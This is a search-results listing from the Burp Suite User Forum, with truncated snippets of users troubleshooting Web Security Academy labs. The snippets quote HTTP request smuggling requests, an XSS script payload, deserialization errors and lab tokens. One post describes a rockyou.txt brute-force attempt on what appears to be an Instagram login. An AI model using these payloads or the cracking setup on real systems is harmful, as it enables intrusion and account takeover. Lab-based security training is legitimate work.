The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Found 50 posts in 45 threads

Lab : Modifying serialized data types. Bug Decoder?

of the video I get this error : PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 I understand that encoded url = %65%33%4d%36%4f%44%6f%69%64%58%4e%6c%63%6d%35%68%62%57%55%69%4f%33%4d%36%4d%54%4d%36%49%6d%46% 6b%62%57%6c%75%61%58%4e%30%63%6d%46%30%62%33%49%69%4f%33%4d%36%4d%54%49%36%49%6d%46%6a%59%32%56%7a%63%

Last updated: Mar 15, 2021 01:48PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

No Host header in https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass

cookie: session=uh7z8Bd1CaBOY98M1UQs5vtO2syzKWRL cookie: _lab=46% u=1 te: trailers content-type: application/x-www-form-urlencoded Thanks for the reply and sorry for bothering.

Last updated: Jul 08, 2024 02:17PM UTC | 3 Agent replies | 3 Community replies | Bug Reports

Missed SQL Injection

identify it with as the following: sqlmap identified the following injection point(s) with a total of 46 =0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded JSESSIONID=29DB5859; username=username; password=password payeeId=abc The website is created for testing web scanner applications, please feel free to use it for that purpose.

Last updated: Nov 23, 2021 08:40AM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Lab: Modifying serialized data types - Debug dumps tokens

y6woegwraq17bq0drumffn0nfujbitmw, p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www/index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7

Last updated: Aug 20, 2021 02:26PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Lab doesn't seem to be working for me, even when I follow the solution. Getting timeout errors. HTTP/1.1 Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 71 POST /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Last updated: Jan 30, 2020 10:00AM UTC | 3 Agent replies | 2 Community replies | Bug Reports

HTTP Request Smuggling

Located at https://portswigger.net/web-security/request-smuggling/finding uri The request for "Confirming responses" is given as "POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded server was given as "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded should be like this: "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 01:54PM UTC | 1 Agent replies | 0 Community replies | How do I?

HTTP Request Smuggling

(It accepts limits between 10-15; I get an invalid request error for values less than 9 and for 9.) The PortSwigger one: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 06:44PM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab 1: Directory traversal (File path traversal, simple case)

3 directories or 4 directories under the root directory, e.g. an image (218.png) could be present in directory /var/www/image/218.png or /var/www/image/abc/218.png. How do we get to know this for applying directory traversal?

Last updated: May 06, 2022 09:39AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: HTTP request smuggling, basic TE.CL vulnerability

The solution for the challenge provided is: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0

Last updated: Dec 08, 2022 07:47AM UTC | 6 Agent replies | 6 Community replies | How do I?

invisible proxy

Here are instructions for "Windows": https://help.oclc.org/Library_Management/EZproxy/Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux": https://www.2daygeek.com/how-to-add-additional-ip-secondary-ip-in-ubuntu-debian-system/

Last updated: Jun 05, 2019 04:40PM UTC | 3 Agent replies | 2 Community replies | How do I?

Solution not functional: "Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses"

Hi Ben, Thank you so much for checking. I tried the same solution with a colleague and it worked for him as well, so it must be something unique. This led me to reset my Burp user settings and that solved the issue for me. HTTP/1.1 Host: 0a4c00f10450f67f802cd1480095009f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Sep 17, 2024 11:20AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Lab: HTTP request smuggling, basic TE.CL vulnerability

Please see below: POST / HTTP/1.1 Host: <lab-ID>.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 For the host, try leaving out https://.

Last updated: Aug 07, 2024 06:52AM UTC | 8 Agent replies | 13 Community replies | How do I?

Lab Issues: Exploiting HTTP request smuggling to deliver reflected XSS

So the exact same thing should work for the virtual victim, but this is not the case. Exploit: POST / HTTP/1.1 Host: my-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded postId=5 HTTP/1.1 User-Agent: a"/><script>alert(1)</script> Content-Type: application/x-www-form-urlencoded

Last updated: Jan 27, 2022 12:17PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

HTTP smuggling

For example, I want to send this request to confirm TE.CL vulnerabilities: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding : chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 03, 2022 04:04PM UTC | 2 Agent replies | 2 Community replies | How do I?

Request Smuggling - Lab does not work

For instance, in the lab "https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header HTTP/1.1 Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 24, 2023 06:51AM UTC | 4 Agent replies | 4 Community replies | How do I?

Lab: Modifying serialized data types

end up with a "Internal Server Error PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line

Setting the right cookie gives the error "PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on username=carlos trick doesn't work for me. Still getting the same error.

answer guide) Internal Server Error PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line

Modifying serialized objects" PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 echo "O:4:"User":2

Last updated: Jul 19, 2023 11:43AM UTC | 8 Agent replies | 15 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Good morning, The following request in the provided solution did work for me but I don't understand HTTP/1.1 Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters) Content-Type: application/x-www-form-urlencoded Thanks in advance for your help. Regards, Luc

Last updated: Aug 17, 2022 02:49PM UTC | 2 Agent replies | 4 Community replies | Burp Extensions

Academy Learning Material minor mistake on "Finding HTTP request smuggling vulnerabilities" page.

reads as below: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 144 x= 0 I believe '7c' is a mistake for the chunk size as it should actually

Last updated: Oct 08, 2021 12:52AM UTC | 0 Agent replies | 0 Community replies | Bug Reports

Lab: HTTP request smuggling, basic TE.CL vulnerability

document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 It is necessary for HTTP1.1.

This part of the request is waiting for a second request on the backend: GET /post? postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 We have a response for this request GET /post?postId=9 HTTP/1.1 .... BUT!

Last updated: Sep 26, 2024 05:26PM UTC | 2 Agent replies | 1 Community replies | How do I?

Exploiting PHP deserialization with a pre-built gadget chain - getting error

Symfony Version: 4.3.6 PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 Thanks

Last updated: Jun 05, 2021 09:01AM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab Login Not Working

HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jul 10, 2020 08:07AM UTC | 3 Agent replies | 5 Community replies | How do I?

HTTP request smuggling, obfuscating the TE header

POST / HTTP/1.1 Host: my host.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Mar 05, 2021 03:32PM UTC | 1 Agent replies | 2 Community replies | How do I?

HTTP request smuggling, basic TE.CL vulnerability

I sent: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 20, 2020 01:02PM UTC | 1 Agent replies | 1 Community replies | How do I?

Not possible to disable "Update Content-Length"

HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 105 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Dec 02, 2022 02:11PM UTC | 3 Agent replies | 3 Community replies | Bug Reports

Proxy connection closed

when intercept is on, it keeps loading for a long time with no result: POST /index.php/login? 7f2f9e055a74df967116223c431c9ffc=qub7j1cc8bi084gvtd3p2b1q84 Connection: close Content-Type: application/x-www-form-urlencoded

Last updated: Feb 17, 2018 08:26AM UTC | 3 Agent replies | 5 Community replies | Bug Reports

why there is an empty line after Content-Length header in http smuggle attacks?

For example: POST /search HTTP/1.1 Host: normal-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 21, 2022 06:13PM UTC | 0 Agent replies | 1 Community replies | How do I?

Advanced Target Scope - Load File

example.com/* test.net/path/here/* www.test.net/* ----------- Would make the following scopes for both http and https: ----------- example\.com .*\.example\.com\/* test\.net\/path\/here\/* www\

Last updated: Mar 30, 2022 09:52AM UTC | 6 Agent replies | 7 Community replies | How do I?

Scanner "X-Forwarded-For dependent response" check alters Content-Type?

I'm seeing behavior from the active scan check for "X-Forwarded-For dependent response" that changes When the scanner sends the request with the added X-Forwarded-For header, it changes the content type Accept-Encoding: gzip, deflate X-CSRFToken: I7qjj8Iz3XwEEwu2gL4ZcePHMdNjOUD6 Content-Type: application/x-www-form-urlencoded Cookie: sessionid=<redacted>; csrftoken=I7qjj8Iz3XwEEwu2gL4ZcePHMdNjOUD6 Connection: close X-Forwarded-For : 127.0.0.1 Notice the change to "Content-Type: application/x-www-form-urlencoded" As this app

Last updated: Jun 01, 2016 08:25AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Issues with Burp Suite Enterprise Edition deployed on GKE

C) Since log disk space has been 46 GB I need to delete that. How can I do that? E) Can you please let me know the below debug settings and how to use them for debugging? settings From time to time, the PortSwigger support team may ask you to enable detailed debugging for

Last updated: Nov 22, 2022 05:59PM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Lab - Modifying serialized objects login function not working properly?

PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www :/usr/share/php') in /var/www/index.php on line 1 And I am unable to log in, therefore no request For more details, I pasted the request and response below: REQUEST POST /login HTTP/1.1 is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www :/usr/share/php') in /var/www/index.php on line 1

Last updated: Oct 24, 2022 03:46PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

PHP deserialization: Signature does not match

receiving this error: PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2

Last updated: Sep 05, 2023 06:14AM UTC | 1 Agent replies | 1 Community replies | How do I?

ca certificate

The URL is http://burp/ - there's no www.

Last updated: Jun 10, 2020 07:32AM UTC | 7 Agent replies | 9 Community replies | Bug Reports

Design new extension - Problem with buildRequest and URL Encode

for(String payload: payloads){ IHttpRequestResponse response = this.callbacks.makeHttpRequest example to look for XSS, is that if you encode the payload in url encode, you can not try to skip filters should submit raw non-encoded payloads to insertion points, and the insertion point has responsibility for script>alert(1)</script> Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded http://127.0.0.1/a.php Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 05, 2018 02:11PM UTC | 6 Agent replies | 6 Community replies | Burp Extensions

HTTP request Smuggling CL.TE LAB

HTTP/1.1 Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net Content-Type: application/x-www-form-urlencoded It is not present the chunk length of the second chunk (smuggled one) Thanks in advance for the support

Last updated: Jan 18, 2023 10:45AM UTC | 2 Agent replies | 3 Community replies | How do I?

LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

HTTP/1.1 Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net Content-Type: application/x-www-form-urlencoded username=carlos HTTP/1.1 X-ayZFvQ-Ip: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Nov 29, 2021 08:07PM UTC | 1 Agent replies | 2 Community replies | How do I?

multiple request headers in burpsuite community edition v2023.7.2

Hi, I am facing an error saying duplicate headers in request using Turbo Intruder for this lab. Cookie: session=8aVCM2qExzt0Y2t1AJ4WhRIKozqAYedJ Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: May 25, 2024 06:30AM UTC | 4 Agent replies | 5 Community replies | How do I?

vulnerable yes or no

POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1 Host: www.---------.com Origin: http://example.com : */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1410 Origin: https://www.--------.com Connection: close Referer: https://www.realself.com

Last updated: Jul 05, 2021 10:20AM UTC | 0 Agent replies | 0 Community replies | How do I?

project file not saved

The timestamp on the main project file is 11:34. The timestamp of the most recent *backup* is 11:46. There are only four backup files: 09:36, 10:07, 10:46, 11:46. I'm running Burp on a Windows 10 VM. I mention this in case it's relevant, but this is how I've used Burp 1.x for years, successfully.

Last updated: Aug 12, 2019 03:30PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

DOM-based open redirection

/burp-suite-explain-dom-based-open-redirection - https://portswigger.net/support/using-burp-to-test-for-open-redirections - https://owasp.org/www-pdf-archive/OWASP_Appsec_Research_2010_Redirects_XSLJ_by_Sirdarckcat_and_Thornmaker.pdf

Last updated: Sep 10, 2021 09:12AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Need help with password cracking

br X-CSRFToken: up5GX5XUvL5cQnTrHa4Z5DrBnaHeJyWb X-Instagram-AJAX: 1 Content-Type: application/x-www-form-urlencoded set it up to do a sniper attack, then I load rockyou.txt as a payload, then I start it and I get this for br X-CSRFToken: up5GX5XUvL5cQnTrHa4Z5DrBnaHeJyWb X-Instagram-AJAX: 1 Content-Type: application/x-www-form-urlencoded sorry for the long post but I have been trying for days to fix this myself and haven't got a clue what else

Last updated: Aug 24, 2016 08:37AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: CSRF where token is not tied to user session

Then by intercepting the POST request for change email 3 times, I found that every time new CSRF token https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded noiA2Y1vmFgJq4K7HZTTbGP9U8hi04Aq --------------------------------------------------- I don't know if it's just for

Last updated: Jun 08, 2020 09:04AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Bug in Lab

error Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4

Last updated: May 25, 2021 01:32PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab Not Working Properly

Hannah, for my sanity, is this lab still working as expected? HTTP/1.1 Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Sep 22, 2024 11:33PM UTC | 5 Agent replies | 12 Community replies | How do I?

HTTP request

POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 01, 2023 07:18AM UTC | 1 Agent replies | 0 Community replies | How do I?

Create an SSL cert with Certbot for a private collaborator server

I'd like to use Certbot to create an SSL cert for a private collaborator server on my domain. certbot certonly --webroot -w /var/www/bc.mydomain -d bc.mydomain I get: Invalid response from http

Last updated: Jun 07, 2021 08:45AM UTC | 1 Agent replies | 0 Community replies | How do I?